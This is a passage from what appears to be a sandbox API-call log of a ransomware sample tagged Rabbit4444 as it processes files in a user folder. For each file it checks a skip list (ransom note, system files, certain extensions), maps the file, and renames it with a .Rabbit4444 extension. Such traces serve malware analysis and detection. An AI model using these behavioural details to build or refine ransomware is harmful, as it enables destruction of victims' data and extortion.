[0067.973] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.973] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0067.973] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.974] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0067.974] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.974] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0067.974] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15928448636) returned 1 [0067.974] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0067.974] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0067.974] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.974] CloseHandle (hObject=0x29c) returned 1 [0067.974] CloseHandle (hObject=0x280) returned 1 [0067.974] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{6BB31C2E-FA0C-4956-A18E-B11812B9C486}.Rabbit4444") returned 156 [0067.974] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{6BB31C2E-FA0C-4956-A18E-B11812B9C486}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{6bb31c2e-fa0c-4956-a18e-b11812b9c486}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{6BB31C2E-FA0C-4956-A18E-B11812B9C486}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{6bb31c2e-fa0c-4956-a18e-b11812b9c486}.rabbit4444"), dwFlags=0x1) returned 1 [0067.975] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a294928, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9a294928, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x42e363fa, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{6BF1EC4C-18E6-43EE-9E47-5AF1592C4017}", cAlternateFileName="{6BF1E~1")) returned 1 [0067.975] lstrcmpiW (lpString1="{6BF1EC4C-18E6-43EE-9E47-5AF1592C4017}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.975] lstrcmpiW (lpString1="{6BF1EC4C-18E6-43EE-9E47-5AF1592C4017}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.975] lstrcmpiW (lpString1="{6BF1EC4C-18E6-43EE-9E47-5AF1592C4017}", lpString2="Rabbit4444.exe") returned -1 [0067.975] lstrcmpiW (lpString1="{6BF1EC4C-18E6-43EE-9E47-5AF1592C4017}", lpString2=".") returned 1 [0067.975] lstrcmpiW (lpString1="{6BF1EC4C-18E6-43EE-9E47-5AF1592C4017}", lpString2="..") returned 1 [0067.975] lstrcmpiW (lpString1="{6BF1EC4C-18E6-43EE-9E47-5AF1592C4017}", lpString2="windows") returned -1 [0067.975] lstrcmpiW (lpString1="{6BF1EC4C-18E6-43EE-9E47-5AF1592C4017}", lpString2="bootmgr") returned -1 [0067.975] lstrcmpiW (lpString1="{6BF1EC4C-18E6-43EE-9E47-5AF1592C4017}", lpString2="pagefile.sys") returned -1 [0067.975] lstrcmpiW (lpString1="{6BF1EC4C-18E6-43EE-9E47-5AF1592C4017}", lpString2="boot") returned -1 [0067.975] lstrcmpiW (lpString1="{6BF1EC4C-18E6-43EE-9E47-5AF1592C4017}", lpString2="ids.txt") returned -1 [0067.975] lstrcmpiW (lpString1="{6BF1EC4C-18E6-43EE-9E47-5AF1592C4017}", lpString2="NTUSER.DAT") returned -1 [0067.975] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{6BF1EC4C-18E6-43EE-9E47-5AF1592C4017}" | out: lpString1="{6BF1EC4C-18E6-43EE-9E47-5AF1592C4017}") returned="{6BF1EC4C-18E6-43EE-9E47-5AF1592C4017}" [0067.975] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{6BF1EC4C-18E6-43EE-9E47-5AF1592C4017}", dwFileAttributes=0x0) returned 1 [0067.976] lstrlenW (lpString="{6BF1EC4C-18E6-43EE-9E47-5AF1592C4017}") returned 38 [0067.976] lstrlenW (lpString="Rabbit4444") returned 10 [0067.976] lstrcmpiW (lpString1="1592C4017}", lpString2="Rabbit4444") returned -1 [0067.976] lstrlenW (lpString=".dll") returned 4 [0067.976] lstrcmpiW (lpString1="017}", lpString2=".dll") returned 1 [0067.976] lstrlenW (lpString=".lnk") returned 4 [0067.976] lstrcmpiW (lpString1="017}", lpString2=".lnk") returned 1 [0067.976] lstrlenW (lpString=".ini") returned 4 [0067.976] lstrcmpiW (lpString1="017}", lpString2=".ini") returned 1 [0067.976] lstrlenW (lpString=".sys") returned 4 [0067.976] lstrcmpiW (lpString1="017}", lpString2=".sys") returned 1 [0067.976] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{6BF1EC4C-18E6-43EE-9E47-5AF1592C4017}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{6bf1ec4c-18e6-43ee-9e47-5af1592c4017}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.977] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.977] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15928742858) returned 1 [0067.977] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0067.977] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0067.977] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102040 [0067.977] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0067.978] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0067.979] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.979] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0067.979] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.979] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0067.979] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.979] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0067.979] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.980] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0067.980] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15929030734) returned 1 [0067.980] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0067.980] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0067.980] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.980] CloseHandle (hObject=0x29c) returned 1 [0067.980] CloseHandle (hObject=0x280) returned 1 [0067.980] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{6BF1EC4C-18E6-43EE-9E47-5AF1592C4017}.Rabbit4444") returned 156 [0067.980] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{6BF1EC4C-18E6-43EE-9E47-5AF1592C4017}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{6bf1ec4c-18e6-43ee-9e47-5af1592c4017}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{6BF1EC4C-18E6-43EE-9E47-5AF1592C4017}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{6bf1ec4c-18e6-43ee-9e47-5af1592c4017}.rabbit4444"), dwFlags=0x1) returned 1 [0067.981] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a9e1c82, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9a9e1c82, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x42e363fa, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{6EB6C718-25FE-4440-B4C1-BF3DE8ADFC98}", cAlternateFileName="{6EB6C~1")) returned 1 [0067.982] lstrcmpiW (lpString1="{6EB6C718-25FE-4440-B4C1-BF3DE8ADFC98}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.982] lstrcmpiW (lpString1="{6EB6C718-25FE-4440-B4C1-BF3DE8ADFC98}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.982] lstrcmpiW (lpString1="{6EB6C718-25FE-4440-B4C1-BF3DE8ADFC98}", lpString2="Rabbit4444.exe") returned -1 [0067.982] lstrcmpiW (lpString1="{6EB6C718-25FE-4440-B4C1-BF3DE8ADFC98}", lpString2=".") returned 1 [0067.982] lstrcmpiW (lpString1="{6EB6C718-25FE-4440-B4C1-BF3DE8ADFC98}", lpString2="..") returned 1 [0067.982] lstrcmpiW (lpString1="{6EB6C718-25FE-4440-B4C1-BF3DE8ADFC98}", lpString2="windows") returned -1 [0067.982] lstrcmpiW (lpString1="{6EB6C718-25FE-4440-B4C1-BF3DE8ADFC98}", lpString2="bootmgr") returned -1 [0067.982] lstrcmpiW (lpString1="{6EB6C718-25FE-4440-B4C1-BF3DE8ADFC98}", lpString2="pagefile.sys") returned -1 [0067.982] lstrcmpiW (lpString1="{6EB6C718-25FE-4440-B4C1-BF3DE8ADFC98}", lpString2="boot") returned -1 [0067.982] lstrcmpiW (lpString1="{6EB6C718-25FE-4440-B4C1-BF3DE8ADFC98}", lpString2="ids.txt") returned -1 [0067.982] lstrcmpiW (lpString1="{6EB6C718-25FE-4440-B4C1-BF3DE8ADFC98}", lpString2="NTUSER.DAT") returned -1 [0067.982] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{6EB6C718-25FE-4440-B4C1-BF3DE8ADFC98}" | out: lpString1="{6EB6C718-25FE-4440-B4C1-BF3DE8ADFC98}") returned="{6EB6C718-25FE-4440-B4C1-BF3DE8ADFC98}" [0067.982] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{6EB6C718-25FE-4440-B4C1-BF3DE8ADFC98}", dwFileAttributes=0x0) returned 1 [0067.983] lstrlenW (lpString="{6EB6C718-25FE-4440-B4C1-BF3DE8ADFC98}") returned 38 [0067.983] lstrlenW (lpString="Rabbit4444") returned 10 [0067.983] lstrcmpiW (lpString1="DE8ADFC98}", lpString2="Rabbit4444") returned -1 [0067.983] lstrlenW (lpString=".dll") returned 4 [0067.983] lstrcmpiW (lpString1="C98}", lpString2=".dll") returned 1 [0067.983] lstrlenW (lpString=".lnk") returned 4 [0067.983] lstrcmpiW (lpString1="C98}", lpString2=".lnk") returned 1 [0067.983] lstrlenW (lpString=".ini") returned 4 [0067.983] lstrcmpiW (lpString1="C98}", lpString2=".ini") returned 1 [0067.983] lstrlenW (lpString=".sys") returned 4 [0067.983] lstrcmpiW (lpString1="C98}", lpString2=".sys") returned 1 [0067.983] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{6EB6C718-25FE-4440-B4C1-BF3DE8ADFC98}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{6eb6c718-25fe-4440-b4c1-bf3de8adfc98}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.983] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.983] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15929424869) returned 1 [0067.984] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0067.984] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0067.984] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0067.984] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0067.985] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0067.986] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.986] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0067.986] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.986] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0067.986] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.986] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0067.986] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.986] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0067.986] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15929687443) returned 1 [0067.986] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0067.986] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0067.986] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.986] CloseHandle (hObject=0x29c) returned 1 [0067.986] CloseHandle (hObject=0x280) returned 1 [0067.986] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{6EB6C718-25FE-4440-B4C1-BF3DE8ADFC98}.Rabbit4444") returned 156 [0067.987] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{6EB6C718-25FE-4440-B4C1-BF3DE8ADFC98}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{6eb6c718-25fe-4440-b4c1-bf3de8adfc98}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{6EB6C718-25FE-4440-B4C1-BF3DE8ADFC98}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{6eb6c718-25fe-4440-b4c1-bf3de8adfc98}.rabbit4444"), dwFlags=0x1) returned 1 [0067.987] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9925685a, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9925685a, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x42e363fa, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{74E006B5-03B7-499C-A87A-98C01F00642C}", cAlternateFileName="{74E00~1")) returned 1 [0067.987] lstrcmpiW (lpString1="{74E006B5-03B7-499C-A87A-98C01F00642C}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.987] lstrcmpiW (lpString1="{74E006B5-03B7-499C-A87A-98C01F00642C}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.987] lstrcmpiW (lpString1="{74E006B5-03B7-499C-A87A-98C01F00642C}", lpString2="Rabbit4444.exe") returned -1 [0067.987] lstrcmpiW (lpString1="{74E006B5-03B7-499C-A87A-98C01F00642C}", lpString2=".") returned 1 [0067.987] lstrcmpiW (lpString1="{74E006B5-03B7-499C-A87A-98C01F00642C}", lpString2="..") returned 1 [0067.987] lstrcmpiW (lpString1="{74E006B5-03B7-499C-A87A-98C01F00642C}", lpString2="windows") returned -1 [0067.987] lstrcmpiW (lpString1="{74E006B5-03B7-499C-A87A-98C01F00642C}", lpString2="bootmgr") returned -1 [0067.987] lstrcmpiW (lpString1="{74E006B5-03B7-499C-A87A-98C01F00642C}", lpString2="pagefile.sys") returned -1 [0067.987] lstrcmpiW (lpString1="{74E006B5-03B7-499C-A87A-98C01F00642C}", lpString2="boot") returned -1 [0067.988] lstrcmpiW (lpString1="{74E006B5-03B7-499C-A87A-98C01F00642C}", lpString2="ids.txt") returned -1 [0067.988] lstrcmpiW (lpString1="{74E006B5-03B7-499C-A87A-98C01F00642C}", lpString2="NTUSER.DAT") returned -1 [0067.988] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{74E006B5-03B7-499C-A87A-98C01F00642C}" | out: lpString1="{74E006B5-03B7-499C-A87A-98C01F00642C}") returned="{74E006B5-03B7-499C-A87A-98C01F00642C}" [0067.988] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{74E006B5-03B7-499C-A87A-98C01F00642C}", dwFileAttributes=0x0) returned 1 [0067.988] lstrlenW (lpString="{74E006B5-03B7-499C-A87A-98C01F00642C}") returned 38 [0067.988] lstrlenW (lpString="Rabbit4444") returned 10 [0067.988] lstrcmpiW (lpString1="01F00642C}", lpString2="Rabbit4444") returned -1 [0067.988] lstrlenW (lpString=".dll") returned 4 [0067.988] lstrcmpiW (lpString1="42C}", lpString2=".dll") returned 1 [0067.988] lstrlenW (lpString=".lnk") returned 4 [0067.988] lstrcmpiW (lpString1="42C}", lpString2=".lnk") returned 1 [0067.988] lstrlenW (lpString=".ini") returned 4 [0067.988] lstrcmpiW (lpString1="42C}", lpString2=".ini") returned 1 [0067.988] lstrlenW (lpString=".sys") returned 4 [0067.988] lstrcmpiW (lpString1="42C}", lpString2=".sys") returned 1 [0067.988] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{74E006B5-03B7-499C-A87A-98C01F00642C}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{74e006b5-03b7-499c-a87a-98c01f00642c}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.989] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.989] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15929934865) returned 1 [0067.989] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0067.989] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0067.989] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0067.989] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0067.990] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0067.991] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.991] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0067.991] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.991] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0067.991] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.991] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0067.991] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.991] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0067.991] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15930391572) returned 1 [0067.993] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0067.993] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0067.993] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.993] CloseHandle (hObject=0x29c) returned 1 [0067.993] CloseHandle (hObject=0x280) returned 1 [0067.994] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{74E006B5-03B7-499C-A87A-98C01F00642C}.Rabbit4444") returned 156 [0067.994] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{74E006B5-03B7-499C-A87A-98C01F00642C}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{74e006b5-03b7-499c-a87a-98c01f00642c}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{74E006B5-03B7-499C-A87A-98C01F00642C}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{74e006b5-03b7-499c-a87a-98c01f00642c}.rabbit4444"), dwFlags=0x1) returned 1 [0067.995] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9bb5100e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9bb5100e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x42e5c5fd, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{754CB5B5-FC11-468D-8A43-AFE0C8CF4582}", cAlternateFileName="{754CB~1")) returned 1 [0067.995] lstrcmpiW (lpString1="{754CB5B5-FC11-468D-8A43-AFE0C8CF4582}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.995] lstrcmpiW (lpString1="{754CB5B5-FC11-468D-8A43-AFE0C8CF4582}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.995] lstrcmpiW (lpString1="{754CB5B5-FC11-468D-8A43-AFE0C8CF4582}", lpString2="Rabbit4444.exe") returned -1 [0067.995] lstrcmpiW (lpString1="{754CB5B5-FC11-468D-8A43-AFE0C8CF4582}", lpString2=".") returned 1 [0067.995] lstrcmpiW (lpString1="{754CB5B5-FC11-468D-8A43-AFE0C8CF4582}", lpString2="..") returned 1 [0067.995] lstrcmpiW (lpString1="{754CB5B5-FC11-468D-8A43-AFE0C8CF4582}", lpString2="windows") returned -1 [0067.995] lstrcmpiW (lpString1="{754CB5B5-FC11-468D-8A43-AFE0C8CF4582}", lpString2="bootmgr") returned -1 [0067.995] lstrcmpiW (lpString1="{754CB5B5-FC11-468D-8A43-AFE0C8CF4582}", lpString2="pagefile.sys") returned -1 [0067.995] lstrcmpiW (lpString1="{754CB5B5-FC11-468D-8A43-AFE0C8CF4582}", lpString2="boot") returned -1 [0067.995] lstrcmpiW (lpString1="{754CB5B5-FC11-468D-8A43-AFE0C8CF4582}", lpString2="ids.txt") returned -1 [0067.995] lstrcmpiW (lpString1="{754CB5B5-FC11-468D-8A43-AFE0C8CF4582}", lpString2="NTUSER.DAT") returned -1 [0067.995] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{754CB5B5-FC11-468D-8A43-AFE0C8CF4582}" | out: lpString1="{754CB5B5-FC11-468D-8A43-AFE0C8CF4582}") returned="{754CB5B5-FC11-468D-8A43-AFE0C8CF4582}" [0067.995] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{754CB5B5-FC11-468D-8A43-AFE0C8CF4582}", dwFileAttributes=0x0) returned 1 [0067.995] lstrlenW (lpString="{754CB5B5-FC11-468D-8A43-AFE0C8CF4582}") returned 38 [0067.995] lstrlenW (lpString="Rabbit4444") returned 10 [0067.995] lstrcmpiW (lpString1="0C8CF4582}", lpString2="Rabbit4444") returned -1 [0067.995] lstrlenW (lpString=".dll") returned 4 [0067.995] lstrcmpiW (lpString1="582}", lpString2=".dll") returned 1 [0067.995] lstrlenW (lpString=".lnk") returned 4 [0067.995] lstrcmpiW (lpString1="582}", lpString2=".lnk") returned 1 [0067.995] lstrlenW (lpString=".ini") returned 4 